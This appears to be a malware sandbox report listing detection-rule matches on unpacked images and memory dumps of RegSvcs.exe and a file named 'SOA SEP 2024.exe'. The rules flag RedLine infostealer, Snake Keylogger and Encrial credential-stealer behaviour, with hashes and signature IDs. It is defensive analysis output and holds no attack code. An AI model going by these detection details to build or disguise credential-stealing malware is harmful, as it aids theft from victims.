Source: 2.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.SOA SEP 2024.exe.6c0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 2.2.RegSvcs.exe.5750000.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.RegSvcs.exe.5750000.7.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.RegSvcs.exe.5750000.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.RegSvcs.exe.5750000.7.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 2.2.RegSvcs.exe.4175570.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.RegSvcs.exe.4175570.5.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.RegSvcs.exe.4175570.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.RegSvcs.exe.4175570.5.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 2.2.RegSvcs.exe.2ee4ee6.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.RegSvcs.exe.2ee4ee6.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.RegSvcs.exe.2ee4ee6.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.RegSvcs.exe.2ee4ee6.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 2.2.RegSvcs.exe.4176458.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.RegSvcs.exe.4176458.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.RegSvcs.exe.4176458.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.RegSvcs.exe.4176458.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 2.2.RegSvcs.exe.2ee4ee6.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.RegSvcs.exe.2ee4ee6.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.RegSvcs.exe.2ee4ee6.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.RegSvcs.exe.2ee4ee6.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 2.2.RegSvcs.exe.5650000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.RegSvcs.exe.5650000.6.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.RegSvcs.exe.5650000.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.RegSvcs.exe.5650000.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 2.2.RegSvcs.exe.41a9590.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.RegSvcs.exe.41a9590.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.RegSvcs.exe.41a9590.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.RegSvcs.exe.41a9590.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 2.2.RegSvcs.exe.5750000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.RegSvcs.exe.5750000.7.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.RegSvcs.exe.5750000.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.RegSvcs.exe.5750000.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 2.2.RegSvcs.exe.5650000.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.RegSvcs.exe.5650000.6.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.RegSvcs.exe.5650000.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.RegSvcs.exe.5650000.6.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 2.2.RegSvcs.exe.5750ee8.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.RegSvcs.exe.5750ee8.8.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.RegSvcs.exe.5750ee8.8.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.RegSvcs.exe.5750ee8.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 2.2.RegSvcs.exe.4176458.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.RegSvcs.exe.4176458.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.RegSvcs.exe.4176458.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.RegSvcs.exe.4176458.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 2.2.RegSvcs.exe.4175570.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.RegSvcs.exe.4175570.5.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.RegSvcs.exe.4175570.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.RegSvcs.exe.4175570.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 2.2.RegSvcs.exe.2ee5dce.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.RegSvcs.exe.2ee5dce.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.RegSvcs.exe.2ee5dce.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.RegSvcs.exe.2ee5dce.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 2.2.RegSvcs.exe.5750ee8.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.RegSvcs.exe.5750ee8.8.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.RegSvcs.exe.5750ee8.8.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.RegSvcs.exe.5750ee8.8.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 2.2.RegSvcs.exe.41a9590.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.RegSvcs.exe.41a9590.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.RegSvcs.exe.41a9590.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.RegSvcs.exe.41a9590.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 2.2.RegSvcs.exe.2ee5dce.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.RegSvcs.exe.2ee5dce.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.RegSvcs.exe.2ee5dce.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.RegSvcs.exe.2ee5dce.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000000.00000002.2102007208.00000000006C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000002.00000002.4555400632.0000000005750000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000002.00000002.4555400632.0000000005750000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000002.00000002.4555400632.0000000005750000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000002.00000002.4555400632.0000000005750000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000002.00000002.4552483120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000002.00000002.4555060395.0000000004171000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000002.00000002.4555060395.0000000004171000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000002.00000002.4555306563.0000000005650000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000002.00000002.4555306563.0000000005650000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000002.00000002.4555306563.0000000005650000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000002.00000002.4555306563.0000000005650000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000002.00000002.4553461018.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000002.00000002.4553461018.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: RegSvcs.exe PID: 1560, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
